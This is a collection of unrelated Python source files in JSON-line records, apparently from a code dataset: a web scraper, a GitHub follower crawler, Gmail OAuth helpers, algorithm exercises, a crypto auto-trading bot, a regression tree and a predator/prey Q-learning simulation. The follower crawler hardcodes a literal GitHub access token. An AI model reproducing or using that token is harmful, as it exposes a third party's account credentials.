'https://smartstore.naver.com' + data\n break\n urls.append(link)\n \n if page < 10:\n page += 1\n try:\n next_page = WebDriverWait(driver, 3, poll_frequency=0.05).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#CategoryProducts > div._1HJarNZHiI._2UJrM31-Ry._3F77jPGGAN > a:nth-child({0})\".format(str(page+1)))))\n except:\n break\n else:\n try:\n next_page = WebDriverWait(driver, 3, poll_frequency=0.05).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#CategoryProducts > div._1HJarNZHiI._2UJrM31-Ry._3F77jPGGAN > a.fAUKm1ewwo._2Ar8-aEUTq\")))\n except:\n break\n if '다음' in next_page.text:\n page = 1\n else:\n break\n driver.execute_script(\"arguments[0].scrollIntoView(true);arguments[0].click();\", next_page)\n sleep(0.5)\nurls = list(set(urls))\ndf = pd.DataFrame(urls)\ndf.to_csv('ss_urls.csv', encoding='utf-8-sig', mode='w')\n\ndriver.close()","sub_path":"20210702/url_smartstore.py","file_name":"url_smartstore.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"203317630","text":"# -*- coding: utf-8 -*-\n\nfrom github import Github\n\n\ndef get_follow_infos():\n g = Github(\"6be01d3dae80b1230fee8e8104d6772bb8922c9b\")\n repos = []\n repos.append(g.get_repo(\"elastic/elasticsearch\"))\n repos.append(g.get_repo(\"elastic/elasticsearch-hadoop\"))\n repos.append(g.get_repo(\"elastic/elasticsearch-metrics-reporter-java\"))\n stack = []\n done_pool = set()\n count = 0\n for repo in repos:\n if count >= 1:\n break\n cons = repo.get_contributors()\n if cons.totalCount < 3:\n continue\n for user in cons:\n if user and user.name:\n stack.append(user)\n count += 1\n print(\"start get the follow infos\")\n with open(\"follow.txt\", \"w\") as txt_file:\n while stack:\n user_tmp = stack.pop()\n if not user_tmp or not user_tmp.name:\n continue\n follower = user_tmp.get_followers()\n cnt = 0\n for u in follower:\n if cnt >= 99:\n break\n if not u or not u.name:\n continue\n if u.name not in done_pool:\n stack.append(u)\n res = \"%s %s\" %(u.name.replace(\" \", \"\"), user_tmp.name.replace(\" \", \"\"))\n print(res)\n txt_file.write(res + \"\\n\")\n cnt += 1\n done_pool.add(user_tmp.name)\n print(\"The task is done\")\n return\n\n\nif __name__ == \"__main__\":\n get_follow_infos()\n","sub_path":"server/data-extract/follow.py","file_name":"follow.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"430610086","text":"\nimport h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nwith h5py.File('data/DPW1258PPG.mat', 'r') as f:\n key = list(f.keys())\n\n for i in key:\n data = f.get(i)\n a = list(data.keys())\n print(i, a)\n for x in list(data.values()):\n print(x.name.split('/')[-1], x.shape)\n for y in x:\n print(y)","sub_path":"parsematlab.py","file_name":"parsematlab.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"258869386","text":"from __future__ import print_function\nimport httplib2\nimport os\n\nfrom apiclient import discovery\nfrom oauth2client import client\nfrom oauth2client import tools\nfrom oauth2client.file import Storage\n\ntry:\n import argparse\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\nexcept ImportError:\n flags = None\n\n# If modifying these scopes, delete your previously saved credentials\n# at 
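# A more direct walk of a MATLAB v7.3 (HDF5) file than the nested loops in
# parsematlab above: visititems calls the function once per group/dataset.
import h5py


def describe(path):
    with h5py.File(path, 'r') as f:
        f.visititems(lambda name, obj: print(name, getattr(obj, 'shape', '(group)')))

# describe('data/DPW1258PPG.mat') would list every dataset with its shape.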
~/.credentials/gmail-python-quickstart.json\nCLIENTSECRETS_LOCATION = '/home/akshay/work/fa/gmail_push_notifications/client_secret_enact.json'\nREDIRECT_URI = 'http://localhost:8090'\nSCOPES = [\n 'https://www.googleapis.com/auth/gmail.readonly',\n 'https://www.googleapis.com/auth/userinfo.email',\n 'https://www.googleapis.com/auth/userinfo.profile',\n # Add other requested scopes.\n]\nAPPLICATION_NAME = 'Gmail API Python Quickstart'\n\ndef get_authorization_url(email_address, state):\n \"\"\"Retrieve the authorization URL.\n\n Args:\n email_address: User's e-mail address.\n state: State for the authorization URL.\n Returns:\n Authorization URL to redirect the user to.\n \"\"\"\n flow = client.flow_from_clientsecrets(CLIENTSECRETS_LOCATION, ' '.join(SCOPES))\n flow.params['access_type'] = 'offline'\n flow.params['approval_prompt'] = 'force'\n flow.params['user_id'] = email_address\n flow.params['state'] = state\n return flow.step1_get_authorize_url(REDIRECT_URI)\n\ndef get_credentials():\n \"\"\"Gets valid user credentials from storage.\n\n If nothing has been stored, or if the stored credentials are invalid,\n the OAuth2 flow is completed to obtain the new credentials.\n\n Returns:\n Credentials, the obtained credential.\n \"\"\"\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'enact-credentials.json')\n\n store = Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENTSECRETS_LOCATION, SCOPES)\n flow.user_agent = APPLICATION_NAME\n if flags:\n credentials = tools.run_flow(flow, store, flags)\n else: # Needed only for compatibility with Python 2.6\n credentials = tools.run(flow, store)\n print('Storing credentials to ' + credential_path)\n return credentials\n","sub_path":"gmail_credentials.py","file_name":"gmail_credentials.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"502937126","text":"\"\"\"\nImplement strStr().\n\nGiven a haystack string and a needle string, find the first position (0-based) at which needle occurs in haystack. If needle is not part of haystack, return -1.\n\nExample 1:\n\nInput: haystack = \"hello\", needle = \"ll\"\nOutput: 2\nExample 2:\n\nInput: haystack = \"aaaaa\", needle = \"bba\"\nOutput: -1\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n Sunday algorithm:\n 1. On a match, return the current idx.\n 2. On a mismatch, look at the character c just past the current window:\n a. if c occurs in the pattern, idx = idx + shift_table[c]\n b. otherwise, idx = idx + len(pattern)\n \"\"\"\n def strStr(self, haystack, needle):\n # build the shift table\n def calShiftMat(st):\n dic = {}\n for i in range(len(st)-1, -1, -1):\n if not dic.get(st[i]):\n dic[st[i]] = len(st) - i\n dic['ot'] = len(st) + 1\n return dic\n # edge case\n if len(needle) > len(haystack):\n return -1\n # edge case\n if needle == \"\":\n return 0\n # initialise the shift table\n dic = calShiftMat(needle)\n idx = 0\n\n while idx+len(needle) <= len(haystack):\n # candidate substring to match\n str_cut = haystack[idx:idx+len(needle)]\n # if the candidate substring equals needle, return the starting index idx\n if str_cut == needle:\n return idx\n else:\n # if we have reached the end without a match, return -1\n if idx+len(needle) >= len(haystack):\n return -1\n # on a mismatch, advance idx by the shift of the next character\n cur_c = haystack[idx+len(needle)]\n if dic.get(cur_c):\n idx += dic[cur_c]\n else:\n idx += dic['ot']\n return -1 if idx+len(needle) >= len(haystack) else idx\n\n\nclass Solution2:\n \"\"\"Shortcut using the built-in str.index()\"\"\"\n def strStr(self, haystack, needle):\n return haystack.index(needle) if needle in 
haystack else -1\n\n\nclass Solution3:\n \"\"\"Brute force\"\"\"\n def strStr(self, haystack, needle):\n # edge case\n if not needle:\n return 0\n n1 = len(haystack)\n n2 = len(needle)\n if n1 < n2:\n return -1\n\n # helper that checks for a full match starting at idx\n def helper(idx):\n haystack_p = idx\n needle_q = 0\n while needle_q < n2:\n if haystack[haystack_p] != needle[needle_q]:\n return False\n else:\n haystack_p += 1\n needle_q += 1\n return True\n\n # try every starting position\n for i in range(n1 - n2 + 1):\n if helper(i):\n return i\n return -1\n","sub_path":"字符串/28-实现strStr().py","file_name":"28-实现strStr().py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"173928135","text":"import argparse\n\nparser = argparse.ArgumentParser('This code is to compute the max value for knapsack problem')\nparser.add_argument(dest='filename', metavar='filename')\nargs = parser.parse_args()\nprint(args.filename)\n\ndef readFile(fileName):\n sackSize = 0\n ret = []\n ret.append((0,0)) #move to 1\n with open(fileName, 'rt') as f:\n lineNum = 0\n for line in f:\n line = line.replace('\\n','')\n lineSplit = line.split()\n if lineNum == 0: \n sackSize = int(lineSplit[0])\n else:\n #value, weight\n ret.append((int(lineSplit[0]), int(lineSplit[1])))\n lineNum += 1\n return sackSize, ret\n\ndef bgKnapsack2(sackSize, sackItems):\n ret = 0\n sack = []\n #init\n sack.append([])\n for x in range(0,sackSize+1):\n sack[0].append(0)\n\n #main knapsack\n for i in range(1, len(sackItems)):\n firstRun = False\n for x in range(0, sackSize+1):\n if not firstRun:\n sack.append([])\n firstRun = True\n case1 = sack[len(sack)-1-1][x] #not including current item\n case2 = 0\n if (x-sackItems[i][1]) >= 0 : #>= so an item may exactly fill the capacity\n case2 = sack[len(sack)-1-1][x-sackItems[i][1]] + sackItems[i][0]\n sack[len(sack)-1].append(max(case1, case2))\n if len(sack) == 3:\n sack.pop(0)\n #print (sack)\n ret = sack[1][sackSize]\n return ret\n\ndef bgKnapsack(sackSize, sackItems):\n ret = 0\n sack = []\n #idea\n #[i] --> list of ([weights] , value) \n\n #init\n sack.append([(range(0,sackSize+1), 0)])\n\n #main knapsack\n for i in range(1, len(sackItems)):\n print ('### observing item # : ' + str(i))\n firstRun = False\n for x in range(0, sackSize+1):\n if not firstRun:\n sack.append([([], 0)])\n firstRun = True\n case1 = 0\n case2 = 0\n #look for x in sack [i-1]\n #print (len(sack)-1-1)\n for sacSum in sack[len(sack)-1-1]:\n if x in sacSum[0]:\n case1 = sacSum[1]\n break\n if (x-sackItems[i][1]) >= 0 :\n for sacSum in sack[len(sack)-1-1]:\n if x-sackItems[i][1] in sacSum[0]:\n case2 = sacSum[1] + sackItems[i][0]\n break\n currSum = max(case1, case2)\n sumFound = False\n for sacSum in sack[len(sack)-1]:\n if sacSum[1] == currSum:\n sacSum[0].append(x)\n sumFound = True\n break\n if not sumFound:\n sack[len(sack)-1].append(([x], currSum))\n #to minimize the array, delete the first array when there are 3 arrays\n if len(sack) == 3:\n sack.pop(0)\n #print (sack)\n #look for ret\n for sacSum in sack[1]:\n if sackSize in sacSum[0]:\n ret = sacSum[1]\n return ret\n\ndef smKnapsack(sackSize, sackItems):\n ret = 0\n sack = []\n #init\n sack.append([])\n for x in range(0,sackSize+1):\n sack[0].append(0)\n\n #main knapsack\n for i in range(1, len(sackItems)):\n for x in range(0, sackSize+1):\n if i >= len(sack):\n sack.append([])\n case1 = sack[i-1][x] #not including current item\n case2 = 0\n if (x-sackItems[i][1]) >= 0 :\n case2 = sack[i-1][x-sackItems[i][1]] + sackItems[i][0]\n sack[i].append(max(case1, case2))\n #print (sack)\n ret = 
sack[len(sackItems)-1][sackSize]\n return ret\n\nsackSize, sackItems = readFile(args.filename)\nprint (sackSize)\noptimumValue2 = bgKnapsack2(sackSize, sackItems)\nprint (optimumValue2)\noptimumValue = smKnapsack(sackSize, sackItems)\nprint (optimumValue)","sub_path":"MP_11/knapsack.py","file_name":"knapsack.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"297134991","text":"def lcs(x, y):\n c = [[0] * (len(y) + 1) for i in range(len(x) + 1)]\n b = [[0] * (len(y) + 1) for i in range(len(x) + 1)]\n for i in range(1, len(x) + 1):\n for j in range(1, len(y) + 1):\n if x[i - 1] == y[j - 1]:\n c[i][j] = c[i - 1][j - 1] + 1\n b[i][j] = 1\n elif c[i - 1][j] >= c[i][j - 1]:\n c[i][j] = c[i - 1][j]\n b[i][j] = 2\n else:\n c[i][j] = c[i][j - 1]\n b[i][j] = 3\n return c, b\n\n\ndef print_lcs(b, x, i, j):\n if i == 0 or j == 0:\n return\n if b[i][j] == 1:\n print_lcs(b, x, i - 1, j - 1)\n print(x[i - 1], end='')\n elif b[i][j] == 2:\n print_lcs(b, x, i - 1, j)\n else:\n print_lcs(b, x, i, j - 1)\n\n\ndef print_matrix(m):\n for i in range(len(m)):\n for j in range(len(m[0])):\n print(m[i][j], end='\\t')\n print()\n\n\nimport random\nimport math\nimport time\nimport string\n\nif __name__ == '__main__':\n n = 250\n m = 640\n x = ''\n y = ''\n\n for i in range(m):\n x += random.choice(string.ascii_uppercase)\n for i in range(n):\n y += random.choice(string.ascii_uppercase)\n\n start = time.time()\n c, b = lcs(x, y)\n end = time.time() - start\n print('n={n},m={m}: time={time:.3f}'.format(n=n, m=m, time=end))","sub_path":"dynamic_programming/lcs.py","file_name":"lcs.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"388901665","text":"# pyupbit install\n# !pip install pyupbit\n\n# 필요 라이브러리 import\nimport time\nimport pyupbit\nimport datetime\nimport requests\nimport numpy as np\nimport pandas as pd\n\n# 딥러닝을 구동하는 데 필요한 케라스 함수를 불러옵니다.\nimport keras\nimport tensorflow.keras.layers as Layer\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, BatchNormalization, Conv2D, MaxPooling2D, Flatten\n\n# 케라스 외의 필요한 라이브러리를 불러옵니다.\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\n\n# Ture가 나와야 GPU가 작동 되는 중 !\nfrom tensorflow.python.client import device_lib \ndevice_lib.list_local_devices() \ntf.test.is_gpu_available()\n\n## 개인정보 관리 주의 -----------------------------------------------##\naccess = \"####\"\nsecret = \"####\"\nmyToken = \"####\"\n##-------------------------------------------------------------------##\n\nupbit = pyupbit.Upbit(access, secret)\ntickers = pyupbit.get_tickers('KRW')\n\n# 잔고가 있을 때 오르는 종목 사고, 내리면 팔고\n# 등락폭 1% 기준으로 둠. 
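# The lcs() implementation above stores the full (m+1) x (n+1) table; when only
# the length is wanted, two rolling rows are enough, as in this sketch.
def lcs_length(x, y):
    prev = [0] * (len(y) + 1)
    for xi in x:
        curr = [0]
        for j, yj in enumerate(y, 1):
            curr.append(prev[j - 1] + 1 if xi == yj else max(prev[j], curr[j - 1]))
        prev = curr
    return prev[-1]

assert lcs_length('ABCBDAB', 'BDCABA') == 4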
\n# 1분 간격으로 확인\n\n# 수익률 저장\ndef save_earning_rate(df):\n earning_rate = df.sort_values(by = '수익률', axis = 0, ascending=False)\n print(earning_rate)\n # 수익률 csv 파일로 저장\n earning_rate.to_csv('./earning_rate.csv')\n\ncoin_dic = dict()\nearning_rate = pd.DataFrame(data = [[0, 0, 0, 0]]*len(tickers), columns=['현재 구매액', '수익', '총 구매액', '수익률'], index=tickers)\n\n# 코인 판매.\nfor item in tickers:\n coin_dic[item] = pyupbit.get_current_price(item)\n coin = upbit.get_balance(item)\n if coin:\n upbit.sell_market_order(item, coin)\n time.sleep(0.21)\n time.sleep(0.03)\n\nwhile True:\n buy_list = []\n time.sleep(60 - datetime.datetime.now().second)\n for item in tickers:\n current_price = pyupbit.get_current_price(item)\n time.sleep(0.03)\n margin = (current_price - coin_dic[item]) / current_price\n if margin > 0.01:\n coin_dic[item] = current_price\n buy_list.append(item)\n elif margin < -0.01:\n # 코인 판매.\n current_moeny = upbit.get_balance('KRW')\n coin = upbit.get_balance(item)\n if coin:\n upbit.sell_market_order(item, coin)\n tmp_money = upbit.get_balance('KRW')\n earning_rate['수익'][item] = tmp_money - current_moeny - earning_rate['현재 구매액'][item]\n earning_rate['현재 구매액'][item] = 0\n earning_rate['수익률'] = round(earning_rate['수익'] / earning_rate['총 구매액'] * 100, 2)\n save_earning_rate(earning_rate)\n # time.sleep(0.21)\n coin_dic[item] = current_price\n else:\n coin_dic[item] = current_price\n\n # 코인 구매\n if (upbit.get_balance('KRW') > 1000) and len(buy_list):\n buy_money = upbit.get_balance('KRW') / len(buy_list) * 0.70\n for item in buy_list:\n upbit.buy_market_order(item, buy_money)\n earning_rate['현재 구매액'][item] += buy_money\n earning_rate['총 구매액'][item] += buy_money\n time.sleep(0.21)\n save_earning_rate(earning_rate)\n","sub_path":"auto_trade.py","file_name":"auto_trade.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"425443785","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 20 19:00:27 2018\n\n@author: VeNoMzZxHD\n\"\"\"\n###\n# Returns tagged entities in training set directory as a list of dictionaries\n###\n\n\nimport re\nimport tkinter\nfrom tkinter.filedialog import askopenfilename, askdirectory\nimport glob\nimport os\n\ndef main():\n tkinter.Tk().withdraw()\n datasetDir = askdirectory()\n files = glob.glob(datasetDir + \"\\*.txt\") #returns list of filepath strings for each file in chosen dir\n \n file_dict = {}\n for file in files: # Iterates through every file in directory\n with open (file) as inFile:\n inString = preprocess(inFile.read()) #Reads entire file to string \n speaker = re.search('(.*?)', inString)\n stime = re.search('(.*?)', inString)\n etime = re.search('(.*?)', inString)\n location = re.search('(.*?)', inString)\n filename = os.path.basename(inFile.name)\n file_dict[filename] = {'speaker' : speaker, 'stime' : stime, 'etime' : etime, 'location' : location} # appends dict of filename: dict of tags\n print(file_dict.popitem()) \n \n### Unescapes file string \ndef preprocess(s):\n s = s.replace(\"\\r\",\"\")\n s = s.replace(\"\\n\",\"\")\n return s\n\nif __name__ == \"__main__\":\n main()\n \n###\n# returns all in files\n###\n\"\"\"\ntags = set()\n for file in files:\n with open (file) as inFile:\n inString = preprocess(inFile.read()) \n tags |= set(re.findall('<(.*?)>', inString))\n valid_tags = set()\n for tag in tags:\n if not '@' in tag and not '/' in tag:\n valid_tags.add(tag)\n print(valid_tags)\n\n\"\"\"\n\n 
","sub_path":"TaggedExtractor.py","file_name":"TaggedExtractor.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"34920702","text":"# Динамическая типизация ----------\n# --------------------------------\n\n\n\ntemp_var_1 = input('Input smth: ')\nprint(temp_var_1, type(temp_var_1), id(temp_var_1))\n\ntemp_var_2 = input('Input smth 2: ')\nprint(temp_var_2, type(temp_var_2), id(temp_var_2))\n\n#temp_var_1 = temp_var_2\ntemp_var_1 = int(temp_var_2)\n\nprint(temp_var_1, type(temp_var_1), id(temp_var_1))\nprint()\n\n# Приведение типов\n\ndef is_digit(string):\n if string.isdigit():\n return True\n else:\n try:\n float(string)\n return True\n except ValueError:\n return False\n\n\ntemp_float = input('Input float number: ')\nprint('Here is string: ', temp_float, type(temp_float), id(temp_float))\nprint()\nif is_digit(temp_float):\n temp_float = float(temp_float)\n print('GRATZ! HERE IS FLOAT!!!', temp_float, type(temp_float), id(temp_float))\nelse:\n print('This is not number :(')","sub_path":"var_id.py","file_name":"var_id.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"356450788","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, val=0, next=None):\r\n# self.val = val\r\n# self.next = next\r\nclass Solution:\r\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\r\n def ln_to_int(l):\r\n res=[]\r\n while l:\r\n res.append(str(l.val))\r\n l=l.next\r\n return res\r\n \r\n l1=int(''.join(ln_to_int(l1)[::-1]))\r\n l2=int(''.join(ln_to_int(l2)[::-1]))\r\n r=list(str(l1+l2))\r\n r=r[::-1]\r\n head=ListNode()\r\n current=head\r\n for i in r:\r\n current.next=ListNode()\r\n current=current.next\r\n current.val=i\r\n return head.next","sub_path":"2_Add_Two_Numbers.py","file_name":"2_Add_Two_Numbers.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"134480994","text":"# coding=utf-8\nimport os\n\n# 设定根目录\nbasedir = os.path.dirname(__file__)\nfile_lists = []\n# 指定想要统计的文件类型\nwhitelist = ['py']\n\n\n# 遍历文件, 递归遍历文件夹中的所有\ndef getFile(base_dir):\n global file_lists\n for parent, dir_names, filenames in os.walk(base_dir):\n for filename in filenames:\n ext = filename.split('.')[-1]\n # 只统计指定的文件类型,略过一些log和cache文件\n if ext in whitelist:\n file_lists.append(os.path.join(parent, filename))\n\n\n# 统计一个的行数\ndef countLine(fp_name):\n count = 0\n # 把文件做二进制看待,read.\n for file_line in open(fp_name, 'rb').readlines():\n if file_line != '' and file_line != '\\n': # 过滤掉空行\n count += 1\n print(fp_name + '----', count)\n return count\n\n\ndef __start__():\n getFile(basedir)\n total_line = 0\n for file_list in file_lists:\n total_line += countLine(file_list)\n\n print(basedir)\n print('total lines:', total_line)\n\n\nif __name__ == '__main__':\n __start__()\n","sub_path":"V2RaycSpider0825/统计项目代码行数.py","file_name":"统计项目代码行数.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"327557244","text":"#coding=utf-8\nimport numpy as np\n\ndef binary_split_dataset(dataset, feature, value):\n # dataset: numpy array\n left_dataset = dataset[np.nonzero(dataset[:, feature] > value)[0], :]\n right_dataset = dataset[np.nonzero(dataset[:, feature] <= value)[0], :]\n return left_dataset, 
right_dataset\n\ndef create_leaf(dataset):\n # 计算标签的均值\n return np.mean(dataset[:, -1])\n\ndef calculate_error(dataset):\n # 计算标签与均值的平方误差\n return np.var(dataset[:, -1]) * dataset.shape[0]\n\ndef choose_best_split(dataset, stop_error=0, stop_num=1):\n # 选择最好的划分特征和划分值\n if len(set(dataset[:, -1].T.tolist())) == 1:\n return None, create_leaf(dataset)\n num_features = dataset.shape[1] - 1\n base_error = calculate_error(dataset)\n best_error = np.inf\n best_feature_index = 0\n best_split_value = 0\n for feature_index in range(num_features):\n for split_value in set(dataset[:, feature_index]):\n left_dataset, right_dataset = binary_split_dataset(dataset, feature_index, split_value)\n num_left = left_dataset.shape[0]\n num_right = right_dataset.shape[0]\n if (num_left < stop_num) or (num_right < stop_num):\n continue\n current_error = calculate_error(left_dataset) + calculate_error(right_dataset)\n if current_error < best_error:\n best_feature_index = feature_index\n best_split_value = split_value\n best_error = current_error\n if (base_error - best_error) < stop_error:\n return None, create_leaf(dataset)\n left_dataset, right_dataset = binary_split_dataset(dataset, best_feature_index, best_split_value)\n num_left = left_dataset.shape[0]\n num_right = right_dataset.shape[0]\n if (num_left < stop_num) or (num_right < stop_num):\n return None, create_leaf(dataset)\n return best_feature_index, best_split_value\n\ndef create_tree(dataset, stop_error=0, stop_num=1):\n split_feature, split_value = choose_best_split(dataset, stop_error, stop_num)\n if split_feature == None:\n return split_value\n tree = {}\n tree['split_index'] = split_feature\n tree['split_value'] = split_value\n left_dataset, right_dataset = binary_split_dataset(dataset, split_feature, split_value)\n tree['left'] = create_tree(left_dataset, stop_error, stop_num)\n tree['right'] = create_tree(right_dataset, stop_error, stop_num)\n return tree\n\ndef is_tree(obj):\n return type(obj).__name__ == 'dict'\n\ndef get_num_leafs(tree):\n if is_tree(tree):\n return get_num_leafs(tree['left']) + get_num_leafs(tree['right'])\n else:\n return 1\n\ndef get_tree_depth(tree):\n if is_tree(tree):\n return 1 + max(get_tree_depth(tree['left']), get_tree_depth(tree['right']))\n else:\n return 1\n\ndef get_mean(tree):\n if not is_tree(tree):\n return tree\n if is_tree(tree['left']):\n tree['left'] = get_mean(tree['left'])\n if is_tree(tree['right']):\n tree['right'] = get_mean(tree['right'])\n return (tree['left'] + tree['right']) / 2.0\n\ndef prune(tree, testdata):\n if not is_tree(tree):\n return tree\n num_examples = testdata.shape[0]\n if num_examples == 0:\n return get_mean(tree)\n left_dataset, right_dataset = binary_split_dataset(testdata, tree['split_index'], tree['split_value'])\n if is_tree(tree['left']):\n tree['left'] = prune(tree['left'], left_dataset)\n if is_tree(tree['right']):\n tree['right'] = prune(tree['right'], right_dataset)\n if not is_tree(tree['left']) and not is_tree(tree['right']):\n error_no_merge = np.sum(np.square(left_dataset[:, -1] - tree['left'])) + np.sum(np.square(right_dataset[:, -1] - tree['right']))\n tree_mean = (tree['left'] + tree['right']) / 2.0\n error_merge = np.sum(np.square(testdata[:, -1] - tree_mean))\n if error_merge < error_no_merge:\n return tree_mean\n else:\n return tree\n else:\n return tree\n\ndef regress(tree, feature_vector):\n if not is_tree(tree):\n return tree\n else:\n if feature_vector[tree['split_index']] > tree['split_value']:\n return regress(tree['left'], feature_vector)\n else:\n return 
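# Usage sketch for the nonzero-mask split used by the regression tree above:
# rows are partitioned on a feature threshold; toy data, last column playing
# the regression target.
import numpy as np

data = np.array([[0.2, 1.0], [0.8, 2.0], [0.5, 1.5], [0.9, 3.0]])
left = data[np.nonzero(data[:, 0] > 0.5)[0], :]
right = data[np.nonzero(data[:, 0] <= 0.5)[0], :]
assert left.shape[0] == 2 and right.shape[0] == 2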
regress(tree['right'], feature_vector)","sub_path":"decision_tree/model/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"637233996","text":"from selenium.webdriver import DesiredCapabilities\n\nfrom testcontainers.selenium import BrowserWebDriverContainer\n\n\ndef test_chrome_container():\n chrome = BrowserWebDriverContainer(DesiredCapabilities.CHROME)\n\n with chrome:\n webdriver = chrome.get_driver()\n webdriver.get(\"http://google.com\")\n webdriver.find_element_by_name(\"q\").send_keys(\"Hello\")","sub_path":"tests/test_webdriver_container.py","file_name":"test_webdriver_container.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"53587667","text":"import os\nfrom setuptools import setup\n\nf = open(os.path.join(os.path.dirname(__file__), 'README.md'))\nreadme = f.read()\nf.close()\n\nsetup(\n name='django-ajaximage-kernel72',\n version='0.2.7',\n description='Upload images and files via ajax. Images are optionally resized.',\n long_description=readme,\n author=\"kernel72\",\n author_email='bradley.griffiths@gmail.com',\n url='https://github.com/bradleyg/django-ajaximage-kernel72',\n packages=['ajaximage'],\n include_package_data=True,\n install_requires=['Django', 'Pillow',],\n zip_safe=False\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"420482791","text":"from tkinter import *\n\nfont1 = (\"Helvetica\", 12)\n\nroot = Tk()\nroot.geometry('100x50+20+20')\n\nmainframe = Frame(root)\nmainframe.grid(column=1000, row=1000, sticky=(N, W, E, S))\nmainframe.columnconfigure(0, weight=1)\nmainframe.rowconfigure(0, weight=1)\n\nbest = StringVar()\nbest.set('start')\nlabel1 = Label(mainframe, textvariable=best,\n bg='#321000', fg='#000fff000', font=font1)\nlabel1.grid()\n\n\ndef run(n=0, master=mainframe):\n best.set('test # %d' % (n))\n n += 1\n if n <= 10:\n mainframe.after(1000, run, n, master)\n\n\nbut1 = Button(text=\"RUN\", command=run)\nbut1.grid()\nroot.mainloop()\n","sub_path":"tkinter-tuts/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"393914571","text":"import os\n\nPROJECT_PATH = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n\nUSER_HOME = os.path.expanduser(\"~\")\n\nSHADOWRAY_CONFIG_FOLDER = os.path.join(PROJECT_PATH, \".shadowray\")\n\nV2RAY_FOLDER = os.path.join(SHADOWRAY_CONFIG_FOLDER, \"v2ray\")\nV2RAY_BINARY = os.path.join(V2RAY_FOLDER, \"v2ray\")\nV2CTL_BINARY = os.path.join(V2RAY_FOLDER, \"v2ctl\")\nEXECUTE_ARGS = \"-config=stdin:\"\n\nRESOURCES_FOLDER = os.path.join(SHADOWRAY_CONFIG_FOLDER, \"resources\")\nSUBSCRIBE_FILE = os.path.join(RESOURCES_FOLDER, \"subscribes.json\")\nSERVER_FILE = os.path.join(RESOURCES_FOLDER, \"servers.json\")\n\nPROJECT_CONFIG_FILE = os.path.join(SHADOWRAY_CONFIG_FOLDER, \"config.json\")\n\nSERVER_KEY_FROM_ORIGINAL = \"servers_original\"\nSERVER_KEY_FROM_SUBSCRIBE = \"servers_subscribe\"\n\nV2RAY_PID_FILE = os.path.join(SHADOWRAY_CONFIG_FOLDER, \"pid\")\n\nCONFIG_STREAM_FILE = os.path.join(SHADOWRAY_CONFIG_FOLDER, 
\"stdin\")\n","sub_path":"shadowray/config/v2ray.py","file_name":"v2ray.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"3429330","text":"try:\n n = int(input(\"enter the size of list\\n\"))\n list = [int(input()) for i in range(n)]\n dict={}\n for each in list:\n if each not in dict:\n dict[each]=1\n else:\n dict[each]+=1\n print(dict)\nexcept Exception as e:\n print(e)","sub_path":"count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"363659969","text":"import Predator\n\nfrom AnimatObject import Animat\nfrom Food import Food\nfrom Obstacle import Obstacle\nimport qlearn_mod_random as qlearn\nfrom Actions import Actions\nimport numpy as np\n\nclass Prey(Animat):\n \n dictionaryOfPreys= dict()\n \n def __init__(self,width,height,color,image,grid):\n Animat.__init__(self, width, height, color,image, grid)\n 